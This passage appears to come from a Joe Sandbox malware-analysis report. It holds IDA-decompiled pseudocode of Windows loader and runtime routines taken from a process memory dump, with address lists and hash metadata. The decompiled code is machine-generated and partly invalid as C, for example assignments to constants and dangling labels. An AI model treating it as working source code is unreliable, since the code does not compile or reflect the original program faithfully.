                                  						_t221 = _v40;
                                  						_v16 =  *_v92;
                                  						_v32 =  &_v28;
                                  						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                  							goto L9;
                                  						}
                                  						_t240 = _v48;
                                  						if( *_v92 != 0x80000000) {
                                  							goto L9;
                                  						}
                                  						 *((intOrPtr*)(_t221 + 8)) = 0;
                                  						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                  						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                  						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                  						_t226 = 0;
                                  						_t181 = _t251 + 0x66;
                                  						_v88 = 0;
                                  						_v92 = _t181;
                                  						do {
                                  							if( *((char*)(_t181 - 2)) == 0) {
                                  								goto L31;
                                  							}
                                  							_t226 = _v88;
                                  							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                  								_t181 = E0346D0F0(1, _t226 + 0x20, 0);
                                  								_t226 = _v40;
                                  								 *(_t226 + 8) = _t181;
                                  								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                  								L34:
                                  								if(_v44 == 0) {
                                  									goto L9;
                                  								}
                                  								_t210 = _v44;
                                  								_t127 = _t210 + 0x1c; // 0x1c
                                  								_t249 = _t127;
                                  								E03442280(_t181, _t127);
                                  								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                  								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                  								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                  								}
                                  								_t189 = L03444620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                  								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                  								if(_t189 != 0) {
                                  									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                  									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                  									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                  									 *_t232 = _t232 + 0x10;
                                  									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                  									E0346F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                  									_t256 = _t256 + 0xc;
                                  								}
                                  								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                  								E0343FFB0(_t210, _t249, _t249);
                                  								_t222 = _v76;
                                  								_t172 = _v80;
                                  								_t208 = _v84;
                                  								_t247 = _v88;
                                  								L10:
                                  								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                  								_v44 = _t238;
                                  								if(_t238 != 0) {
                                  									 *0x351b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                  									_v44();
                                  								}
                                  								_pop(_t248);
                                  								_pop(_t252);
                                  								_pop(_t209);
                                  								return E0346B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                  							}
                                  							_t181 = _v92;
                                  							L31:
                                  							_t226 = _t226 + 1;
                                  							_t181 =  &(_t181[0x18]);
                                  							_v88 = _t226;
                                  							_v92 = _t181;
                                  						} while (_t226 < 4);
                                  						goto L34;
                                  					}
                                  					L9:
                                  					_t172 = _v104;
                                  					_t222 = _v100;
                                  					goto L10;
                                  				}
                                  				_t247 = _t246 | 0xffffffff;
                                  				_t208 = _t247;
                                  				_v84 = _t247;
                                  				_v80 = _t208;
                                  				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                  					_t233 = _v72;
                                  					_v105 = _v64;
                                  					_t202 = _v76;
                                  				} else {
                                  					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                  					_v105 = 1;
                                  					if(_v63 <= _t204) {
                                  						_v63 = _t204;
                                  					}
                                  					_t202 = _v76 |  *(_t251 + 0x40);
                                  					_t233 = _v72 |  *(_t251 + 0x44);
                                  					_t247 =  *(_t251 + 0x38);
                                  					_t208 =  *(_t251 + 0x3c);
                                  					_v76 = _t202;
                                  					_v72 = _t233;
                                  					_v84 = _t247;
                                  					_v80 = _t208;
                                  				}
                                  				_v104 = _t202;
                                  				_v100 = _t233;
                                  				if( *((char*)(_t251 + 0xc4)) != 0) {
                                  					_t237 = _v48;
                                  					_v105 = 1;
                                  					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                  						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                  						_t237 = _v48;
                                  					}
                                  					_t203 = _t202 |  *(_t251 + 0xb8);
                                  					_t234 = _t233 |  *(_t251 + 0xbc);
                                  					_t247 = _t247 &  *(_t251 + 0xb0);
                                  					_t208 = _t208 &  *(_t251 + 0xb4);
                                  					_v104 = _t203;
                                  					_v76 = _t203;
                                  					_v100 = _t234;
                                  					_v72 = _t234;
                                  					_v84 = _t247;
                                  					_v80 = _t208;
                                  				}
                                  				if(_v105 == 0) {
                                  					_v36 = _v36 & 0x00000000;
                                  					_t208 = 0;
                                  					_t247 = 0;
                                  					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                  					goto L19;
                                  				} else {
                                  					_v36 = 1;
                                  					goto L8;
                                  				}
                                  			}































































                                  0x03455142
                                  0x0345514c
                                  0x03455150
                                  0x03455157
                                  0x03455159
                                  0x0345515e
                                  0x03455165
                                  0x03455169
                                  0x0345516c
                                  0x03455172
                                  0x03455176
                                  0x0345517a
                                  0x0345517a
                                  0x0345517a
                                  0x0345517f
                                  0x03496d8b
                                  0x03496d8e
                                  0x03496d91
                                  0x03496d95
                                  0x03496d98
                                  0x03496d9c
                                  0x03496da0
                                  0x03496da3
                                  0x03496da7
                                  0x03496e26
                                  0x03496e26
                                  0x03496e2a
                                  0x034551f9
                                  0x034551f9
                                  0x034551fe
                                  0x03496e33
                                  0x03496e33
                                  0x03496e39
                                  0x03496e3d
                                  0x03496e46
                                  0x03496e50
                                  0x00000000
                                  0x00000000
                                  0x03496e52
                                  0x03496e53
                                  0x03496e56
                                  0x03496e5d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03496e5f
                                  0x03496e67
                                  0x03496e77
                                  0x03496e7f
                                  0x03496e80
                                  0x03496e88
                                  0x03496e90
                                  0x03496e9f
                                  0x03496ea5
                                  0x03496ea9
                                  0x03496eb1
                                  0x03496ebf
                                  0x00000000
                                  0x00000000
                                  0x03496ecf
                                  0x03496ed3
                                  0x00000000
                                  0x00000000
                                  0x03496edb
                                  0x03496ede
                                  0x03496ee1
                                  0x03496ee8
                                  0x03496eeb
                                  0x03496eed
                                  0x03496ef0
                                  0x03496ef4
                                  0x03496ef8
                                  0x03496efc
                                  0x00000000
                                  0x00000000
                                  0x03496f0d
                                  0x03496f11
                                  0x03496f32
                                  0x03496f37
                                  0x03496f3b
                                  0x03496f3e
                                  0x03496f41
                                  0x03496f46
                                  0x00000000
                                  0x00000000
                                  0x03496f4c
                                  0x03496f50
                                  0x03496f50
                                  0x03496f54
                                  0x03496f62
                                  0x03496f65
                                  0x03496f6d
                                  0x03496f7b
                                  0x03496f7b
                                  0x03496f93
                                  0x03496f98
                                  0x03496fa0
                                  0x03496fa6
                                  0x03496fb3
                                  0x03496fb6
                                  0x03496fbf
                                  0x03496fc1
                                  0x03496fd5
                                  0x03496fda
                                  0x03496fda
                                  0x03496fdd
                                  0x03496fe2
                                  0x03496fe7
                                  0x03496feb
                                  0x03496fef
                                  0x03496ff3
                                  0x0345520c
                                  0x0345520c
                                  0x0345520f
                                  0x03455215
                                  0x03455234
                                  0x0345523a
                                  0x0345523a
                                  0x03455244
                                  0x03455245
                                  0x03455246
                                  0x03455251
                                  0x03455251
                                  0x03496f13
                                  0x03496f17
                                  0x03496f17
                                  0x03496f18
                                  0x03496f1b
                                  0x03496f1f
                                  0x03496f23
                                  0x00000000
                                  0x03496f28
                                  0x03455204
                                  0x03455204
                                  0x03455208
                                  0x00000000
                                  0x03455208
                                  0x03455185
                                  0x03455188
                                  0x0345518a
                                  0x0345518e
                                  0x03455195
                                  0x03496db1
                                  0x03496db5
                                  0x03496db9
                                  0x0345519b
                                  0x0345519b
                                  0x0345519e
                                  0x034551a7
                                  0x034551a9
                                  0x034551a9
                                  0x034551b5
                                  0x034551b8
                                  0x034551bb
                                  0x034551be
                                  0x034551c1
                                  0x034551c5
                                  0x034551c9
                                  0x034551cd
                                  0x034551cd
                                  0x034551d8
                                  0x034551dc
                                  0x034551e0
                                  0x03496dcc
                                  0x03496dd0
                                  0x03496dd5
                                  0x03496ddd
                                  0x03496de1
                                  0x03496de1
                                  0x03496de5
                                  0x03496deb
                                  0x03496df1
                                  0x03496df7
                                  0x03496dfd
                                  0x03496e01
                                  0x03496e05
                                  0x03496e09
                                  0x03496e0d
                                  0x03496e11
                                  0x03496e11
                                  0x034551eb
                                  0x03496e1a
                                  0x03496e1f
                                  0x03496e21
                                  0x03496e23
                                  0x00000000
                                  0x034551f1
                                  0x034551f1
                                  0x00000000
                                  0x034551f1

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20809e1b4707cbebccb9cf839040cc23a48a01762532bc483a251082967f00c8
                                  • Instruction ID: f1973a30a550b82f240ee65673b55805dc4670c084b4511503bb6fd74a428498
                                  • Opcode Fuzzy Hash: 20809e1b4707cbebccb9cf839040cc23a48a01762532bc483a251082967f00c8
                                  • Instruction Fuzzy Hash: ECC132759083808FD754CF28C580A6AFBF1BF89314F184A6EF8998B362D775E845CB46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E034503E2(signed int __ecx, signed int __edx) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				intOrPtr _v40;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v64;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t56;
                                  				signed int _t58;
                                  				char* _t64;
                                  				intOrPtr _t65;
                                  				signed int _t74;
                                  				signed int _t79;
                                  				char* _t83;
                                  				intOrPtr _t84;
                                  				signed int _t93;
                                  				signed int _t94;
                                  				signed char* _t95;
                                  				signed int _t99;
                                  				signed int _t100;
                                  				signed char* _t101;
                                  				signed int _t105;
                                  				signed int _t119;
                                  				signed int _t120;
                                  				void* _t122;
                                  				signed int _t123;
                                  				signed int _t127;
                                  
                                  				_v8 =  *0x351d360 ^ _t127;
                                  				_t119 = __ecx;
                                  				_t105 = __edx;
                                  				_t118 = 0;
                                  				_v20 = __edx;
                                  				_t120 =  *(__ecx + 0x20);
                                  				if(E03450548(__ecx, 0) != 0) {
                                  					_t56 = 0xc000022d;
                                  					L23:
                                  					return E0346B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                  				} else {
                                  					_v12 = _v12 | 0xffffffff;
                                  					_t58 = _t120 + 0x24;
                                  					_t109 =  *(_t120 + 0x18);
                                  					_t118 = _t58;
                                  					_v16 = _t58;
                                  					E0343B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                  					_v52 = 0x18;
                                  					_v48 = 0;
                                  					0x840 = 0x40;
                                  					if( *0x3517c1c != 0) {
                                  					}
                                  					_v40 = 0x840;
                                  					_v44 = _t105;
                                  					_v36 = 0;
                                  					_v32 = 0;
                                  					if(E03447D50() != 0) {
                                  						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  					} else {
                                  						_t64 = 0x7ffe0384;
                                  					}
                                  					if( *_t64 != 0) {
                                  						_t65 =  *[fs:0x30];
                                  						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                  						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                  							_t100 = E03447D50();
                                  							__eflags = _t100;
                                  							if(_t100 == 0) {
                                  								_t101 = 0x7ffe0385;
                                  							} else {
                                  								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  							}
                                  							__eflags =  *_t101 & 0x00000020;
                                  							if(( *_t101 & 0x00000020) != 0) {
                                  								_t118 = _t118 | 0xffffffff;
                                  								_t109 = 0x1485;
                                  								E034A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                  							}
                                  						}
                                  					}
                                  					_t105 = 0;
                                  					while(1) {
                                  						_push(0x60);
                                  						_push(5);
                                  						_push( &_v64);
                                  						_push( &_v52);
                                  						_push(0x100021);
                                  						_push( &_v12);
                                  						_t122 = E03469830();
                                  						if(_t122 >= 0) {
                                  							break;
                                  						}
                                  						__eflags = _t122 - 0xc0000034;
                                  						if(_t122 == 0xc0000034) {
                                  							L38:
                                  							_t120 = 0xc0000135;
                                  							break;
                                  						}
                                  						__eflags = _t122 - 0xc000003a;
                                  						if(_t122 == 0xc000003a) {
                                  							goto L38;
                                  						}
                                  						__eflags = _t122 - 0xc0000022;
                                  						if(_t122 != 0xc0000022) {
                                  							break;
                                  						}
                                  						__eflags = _t105;
                                  						if(__eflags != 0) {
                                  							break;
                                  						}
                                  						_t109 = _t119;
                                  						_t99 = E034A69A6(_t119, __eflags);
                                  						__eflags = _t99;
                                  						if(_t99 == 0) {
                                  							break;
                                  						}
                                  						_t105 = _t105 + 1;
                                  					}
                                  					if( !_t120 >= 0) {
                                  						L22:
                                  						_t56 = _t120;
                                  						goto L23;
                                  					}
                                  					if( *0x3517c04 != 0) {
                                  						_t118 = _v12;
                                  						_t120 = E034AA7AC(_t119, _t118, _t109);
                                  						__eflags = _t120;
                                  						if(_t120 >= 0) {
                                  							goto L10;
                                  						}
                                  						__eflags =  *0x3517bd8;
                                  						if( *0x3517bd8 != 0) {
                                  							L20:
                                  							if(_v12 != 0xffffffff) {
                                  								_push(_v12);
                                  								E034695D0();
                                  							}
                                  							goto L22;
                                  						}
                                  					}
                                  					L10:
                                  					_push(_v12);
                                  					_t105 = _t119 + 0xc;
                                  					_push(0x1000000);
                                  					_push(0x10);
                                  					_push(0);
                                  					_push(0);
                                  					_push(0xf);
                                  					_push(_t105);
                                  					_t120 = E034699A0();
                                  					if(_t120 < 0) {
                                  						__eflags = _t120 - 0xc000047e;
                                  						if(_t120 == 0xc000047e) {
                                  							L51:
                                  							_t74 = E034A3540(_t120);
                                  							_t119 = _v16;
                                  							_t120 = _t74;
                                  							L52:
                                  							_t118 = 0x1485;
                                  							E0342B1E1(_t120, 0x1485, 0, _t119);
                                  							goto L20;
                                  						}
                                  						__eflags = _t120 - 0xc000047f;
                                  						if(_t120 == 0xc000047f) {
                                  							goto L51;
                                  						}
                                  						__eflags = _t120 - 0xc0000462;
                                  						if(_t120 == 0xc0000462) {
                                  							goto L51;
                                  						}
                                  						_t119 = _v16;
                                  						__eflags = _t120 - 0xc0000017;
                                  						if(_t120 != 0xc0000017) {
                                  							__eflags = _t120 - 0xc000009a;
                                  							if(_t120 != 0xc000009a) {
                                  								__eflags = _t120 - 0xc000012d;
                                  								if(_t120 != 0xc000012d) {
                                  									_v28 = _t119;
                                  									_push( &_v56);
                                  									_push(1);
                                  									_v24 = _t120;
                                  									_push( &_v28);
                                  									_push(1);
                                  									_push(2);
                                  									_push(0xc000007b);
                                  									_t79 = E0346AAF0();
                                  									__eflags = _t79;
                                  									if(_t79 >= 0) {
                                  										__eflags =  *0x3518474 - 3;
                                  										if( *0x3518474 != 3) {
                                  											 *0x35179dc =  *0x35179dc + 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L52;
                                  					}
                                  					if(E03447D50() != 0) {
                                  						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  					} else {
                                  						_t83 = 0x7ffe0384;
                                  					}
                                  					if( *_t83 != 0) {
                                  						_t84 =  *[fs:0x30];
                                  						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                  						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                  							_t94 = E03447D50();
                                  							__eflags = _t94;
                                  							if(_t94 == 0) {
                                  								_t95 = 0x7ffe0385;
                                  							} else {
                                  								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  							}
                                  							__eflags =  *_t95 & 0x00000020;
                                  							if(( *_t95 & 0x00000020) != 0) {
                                  								E034A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                  							}
                                  						}
                                  					}
                                  					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                  						if( *0x3518708 != 0) {
                                  							_t118 =  *0x7ffe0330;
                                  							_t123 =  *0x3517b00; // 0x0
                                  							asm("ror esi, cl");
                                  							 *0x351b1e0(_v12, _v20, 0x20);
                                  							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                  							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                  							asm("sbb esi, esi");
                                  							_t120 =  ~_t50 & _t93;
                                  						} else {
                                  							_t120 = 0;
                                  						}
                                  					}
                                  					if( !_t120 >= 0) {
                                  						L19:
                                  						_push( *_t105);
                                  						E034695D0();
                                  						 *_t105 =  *_t105 & 0x00000000;
                                  						goto L20;
                                  					}
                                  					_t120 = E03437F65(_t119);
                                  					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                  						__eflags = _t120;
                                  						if(_t120 < 0) {
                                  							goto L19;
                                  						}
                                  						 *(_t119 + 0x64) = _v12;
                                  						goto L22;
                                  					}
                                  					goto L19;
                                  				}
                                  			}








































                                  0x034503f1
                                  0x034503f7
                                  0x034503f9
                                  0x034503fb
                                  0x034503fd
                                  0x03450400
                                  0x0345040a
                                  0x03494c7a
                                  0x03450537
                                  0x03450547
                                  0x03450410
                                  0x03450410
                                  0x03450414
                                  0x03450417
                                  0x0345041a
                                  0x03450421
                                  0x03450424
                                  0x0345042b
                                  0x0345043b
                                  0x0345043e
                                  0x0345043f
                                  0x0345043f
                                  0x03450446
                                  0x03450449
                                  0x0345044c
                                  0x0345044f
                                  0x03450459
                                  0x03494c8d
                                  0x0345045f
                                  0x0345045f
                                  0x0345045f
                                  0x03450467
                                  0x03494c97
                                  0x03494c9d
                                  0x03494ca4
                                  0x03494caa
                                  0x03494caf
                                  0x03494cb1
                                  0x03494cc3
                                  0x03494cb3
                                  0x03494cbc
                                  0x03494cbc
                                  0x03494cc8
                                  0x03494ccb
                                  0x03494cd7
                                  0x03494cda
                                  0x03494cdf
                                  0x03494cdf
                                  0x03494ccb
                                  0x03494ca4
                                  0x0345046d
                                  0x0345046f
                                  0x0345046f
                                  0x03450471
                                  0x03450476
                                  0x0345047a
                                  0x0345047b
                                  0x03450483
                                  0x03450489
                                  0x0345048d
                                  0x00000000
                                  0x00000000
                                  0x03494ce9
                                  0x03494cef
                                  0x03494d22
                                  0x03494d22
                                  0x00000000
                                  0x03494d22
                                  0x03494cf1
                                  0x03494cf7
                                  0x00000000
                                  0x00000000
                                  0x03494cf9
                                  0x03494cff
                                  0x00000000
                                  0x00000000
                                  0x03494d05
                                  0x03494d07
                                  0x00000000
                                  0x00000000
                                  0x03494d0d
                                  0x03494d0f
                                  0x03494d14
                                  0x03494d16
                                  0x00000000
                                  0x00000000
                                  0x03494d1c
                                  0x03494d1c
                                  0x03450499
                                  0x03450535
                                  0x03450535
                                  0x00000000
                                  0x03450535
                                  0x034504a6
                                  0x03494d2c
                                  0x03494d37
                                  0x03494d39
                                  0x03494d3b
                                  0x00000000
                                  0x00000000
                                  0x03494d41
                                  0x03494d48
                                  0x03450527
                                  0x0345052b
                                  0x0345052d
                                  0x03450530
                                  0x03450530
                                  0x00000000
                                  0x0345052b
                                  0x03494d4e
                                  0x034504ac
                                  0x034504ac
                                  0x034504af
                                  0x034504b2
                                  0x034504b7
                                  0x034504b9
                                  0x034504bb
                                  0x034504bd
                                  0x034504bf
                                  0x034504c5
                                  0x034504c9
                                  0x03494d53
                                  0x03494d59
                                  0x03494db9
                                  0x03494dba
                                  0x03494dbf
                                  0x03494dc2
                                  0x03494dc4
                                  0x03494dc7
                                  0x03494dce
                                  0x00000000
                                  0x03494dce
                                  0x03494d5b
                                  0x03494d61
                                  0x00000000
                                  0x00000000
                                  0x03494d63
                                  0x03494d69
                                  0x00000000
                                  0x00000000
                                  0x03494d6b
                                  0x03494d6e
                                  0x03494d74
                                  0x03494d76
                                  0x03494d7c
                                  0x03494d7e
                                  0x03494d84
                                  0x03494d89
                                  0x03494d8c
                                  0x03494d8d
                                  0x03494d92
                                  0x03494d95
                                  0x03494d96
                                  0x03494d98
                                  0x03494d9a
                                  0x03494d9f
                                  0x03494da4
                                  0x03494da6
                                  0x03494da8
                                  0x03494daf
                                  0x03494db1
                                  0x03494db1
                                  0x03494daf
                                  0x03494da6
                                  0x03494d84
                                  0x03494d7c
                                  0x00000000
                                  0x03494d74
                                  0x034504d6
                                  0x03494de1
                                  0x034504dc
                                  0x034504dc
                                  0x034504dc
                                  0x034504e4
                                  0x03494deb
                                  0x03494df1
                                  0x03494df8
                                  0x03494dfe
                                  0x03494e03
                                  0x03494e05
                                  0x03494e17
                                  0x03494e07
                                  0x03494e10
                                  0x03494e10
                                  0x03494e1c
                                  0x03494e1f
                                  0x03494e35
                                  0x03494e35
                                  0x03494e1f
                                  0x03494df8
                                  0x034504f1
                                  0x034504fa
                                  0x03494e3f
                                  0x03494e47
                                  0x03494e5b
                                  0x03494e61
                                  0x03494e67
                                  0x03494e69
                                  0x03494e71
                                  0x03494e73
                                  0x03450500
                                  0x03450500
                                  0x03450500
                                  0x034504fa
                                  0x03450508
                                  0x0345051d
                                  0x0345051d
                                  0x0345051f
                                  0x03450524
                                  0x00000000
                                  0x03450524
                                  0x03450515
                                  0x03450517
                                  0x03494e7a
                                  0x03494e7c
                                  0x00000000
                                  0x00000000
                                  0x03494e85
                                  0x00000000
                                  0x03494e85
                                  0x00000000
                                  0x03450517

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ffef1abf763a48ad14749d1e0c09165e8138e87c4fe3fcfe9c57d4bd65cd2e5a
                                  • Instruction ID: 02b7f96636d49bf53628539dfa1d64d82a18ad2920fd92e96af1ff5c091bbb73
                                  • Opcode Fuzzy Hash: ffef1abf763a48ad14749d1e0c09165e8138e87c4fe3fcfe9c57d4bd65cd2e5a
                                  • Instruction Fuzzy Hash: 6991E579E006149FEF21DB69C844BAEBBA4AB05714F0A0267FD20AF3D1D7749D02C789
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0342C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                  				signed int _v8;
                                  				char _v1036;
                                  				signed int _v1040;
                                  				char _v1048;
                                  				signed int _v1052;
                                  				signed char _v1056;
                                  				void* _v1058;
                                  				char _v1060;
                                  				signed int _v1064;
                                  				void* _v1068;
                                  				intOrPtr _v1072;
                                  				void* _v1084;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t70;
                                  				intOrPtr _t72;
                                  				signed int _t74;
                                  				intOrPtr _t77;
                                  				signed int _t78;
                                  				signed int _t81;
                                  				void* _t101;
                                  				signed int _t102;
                                  				signed int _t107;
                                  				signed int _t109;
                                  				signed int _t110;
                                  				signed char _t111;
                                  				signed int _t112;
                                  				signed int _t113;
                                  				signed int _t114;
                                  				intOrPtr _t116;
                                  				void* _t117;
                                  				char _t118;
                                  				void* _t120;
                                  				char _t121;
                                  				signed int _t122;
                                  				signed int _t123;
                                  				signed int _t125;
                                  
                                  				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                  				_v8 =  *0x351d360 ^ _t125;
                                  				_t116 = _a4;
                                  				_v1056 = _a16;
                                  				_v1040 = _a24;
                                  				if(E03436D30( &_v1048, _a8) < 0) {
                                  					L4:
                                  					_pop(_t117);
                                  					_pop(_t120);
                                  					_pop(_t101);
                                  					return E0346B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                  				}
                                  				_t70 = _a20;
                                  				if(_t70 >= 0x3f4) {
                                  					_t121 = _t70 + 0xc;
                                  					L19:
                                  					_t107 =  *( *[fs:0x30] + 0x18);
                                  					__eflags = _t107;
                                  					if(_t107 == 0) {
                                  						L60:
                                  						_t68 = 0xc0000017;
                                  						goto L4;
                                  					}
                                  					_t72 =  *0x3517b9c; // 0x0
                                  					_t74 = L03444620(_t107, _t107, _t72 + 0x180000, _t121);
                                  					_v1064 = _t74;
                                  					__eflags = _t74;
                                  					if(_t74 == 0) {
                                  						goto L60;
                                  					}
                                  					_t102 = _t74;
                                  					_push( &_v1060);
                                  					_push(_t121);
                                  					_push(_t74);
                                  					_push(2);
                                  					_push( &_v1048);
                                  					_push(_t116);
                                  					_t122 = E03469650();
                                  					__eflags = _t122;
                                  					if(_t122 >= 0) {
                                  						L7:
                                  						_t114 = _a12;
                                  						__eflags = _t114;
                                  						if(_t114 != 0) {
                                  							_t77 = _a20;
                                  							L26:
                                  							_t109 =  *(_t102 + 4);
                                  							__eflags = _t109 - 3;
                                  							if(_t109 == 3) {
                                  								L55:
                                  								__eflags = _t114 - _t109;
                                  								if(_t114 != _t109) {
                                  									L59:
                                  									_t122 = 0xc0000024;
                                  									L15:
                                  									_t78 = _v1052;
                                  									__eflags = _t78;
                                  									if(_t78 != 0) {
                                  										L034477F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                  									}
                                  									_t68 = _t122;
                                  									goto L4;
                                  								}
                                  								_t110 = _v1056;
                                  								_t118 =  *((intOrPtr*)(_t102 + 8));
                                  								_v1060 = _t118;
                                  								__eflags = _t110;
                                  								if(_t110 == 0) {
                                  									L10:
                                  									_t122 = 0x80000005;
                                  									L11:
                                  									_t81 = _v1040;
                                  									__eflags = _t81;
                                  									if(_t81 == 0) {
                                  										goto L15;
                                  									}
                                  									__eflags = _t122;
                                  									if(_t122 >= 0) {
                                  										L14:
                                  										 *_t81 = _t118;
                                  										goto L15;
                                  									}
                                  									__eflags = _t122 - 0x80000005;
                                  									if(_t122 != 0x80000005) {
                                  										goto L15;
                                  									}
                                  									goto L14;
                                  								}
                                  								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                  								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                  									goto L10;
                                  								}
                                  								_push( *((intOrPtr*)(_t102 + 8)));
                                  								_t59 = _t102 + 0xc; // 0xc
                                  								_push(_t110);
                                  								L54:
                                  								E0346F3E0();
                                  								_t125 = _t125 + 0xc;
                                  								goto L11;
                                  							}
                                  							__eflags = _t109 - 7;
                                  							if(_t109 == 7) {
                                  								goto L55;
                                  							}
                                  							_t118 = 4;
                                  							__eflags = _t109 - _t118;
                                  							if(_t109 != _t118) {
                                  								__eflags = _t109 - 0xb;
                                  								if(_t109 != 0xb) {
                                  									__eflags = _t109 - 1;
                                  									if(_t109 == 1) {
                                  										__eflags = _t114 - _t118;
                                  										if(_t114 != _t118) {
                                  											_t118 =  *((intOrPtr*)(_t102 + 8));
                                  											_v1060 = _t118;
                                  											__eflags = _t118 - _t77;
                                  											if(_t118 > _t77) {
                                  												goto L10;
                                  											}
                                  											_push(_t118);
                                  											_t56 = _t102 + 0xc; // 0xc
                                  											_push(_v1056);
                                  											goto L54;
                                  										}
                                  										__eflags = _t77 - _t118;
                                  										if(_t77 != _t118) {
                                  											L34:
                                  											_t122 = 0xc0000004;
                                  											goto L15;
                                  										}
                                  										_t111 = _v1056;
                                  										__eflags = _t111 & 0x00000003;
                                  										if((_t111 & 0x00000003) == 0) {
                                  											_v1060 = _t118;
                                  											__eflags = _t111;
                                  											if(__eflags == 0) {
                                  												goto L10;
                                  											}
                                  											_t42 = _t102 + 0xc; // 0xc
                                  											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                  											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                  											_push(_t111);
                                  											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                  											_push(0);
                                  											_push( &_v1048);
                                  											_t122 = E034613C0(_t102, _t118, _t122, __eflags);
                                  											L44:
                                  											_t118 = _v1072;
                                  											goto L11;
                                  										}
                                  										_t122 = 0x80000002;
                                  										goto L15;
                                  									}
                                  									_t122 = 0xc0000024;
                                  									goto L44;
                                  								}
                                  								__eflags = _t114 - _t109;
                                  								if(_t114 != _t109) {
                                  									goto L59;
                                  								}
                                  								_t118 = 8;
                                  								__eflags = _t77 - _t118;
                                  								if(_t77 != _t118) {
                                  									goto L34;
                                  								}
                                  								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                  								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                  									goto L34;
                                  								}
                                  								_t112 = _v1056;
                                  								_v1060 = _t118;
                                  								__eflags = _t112;
                                  								if(_t112 == 0) {
                                  									goto L10;
                                  								}
                                  								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                  								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                  								goto L11;
                                  							}
                                  							__eflags = _t114 - _t118;
                                  							if(_t114 != _t118) {
                                  								goto L59;
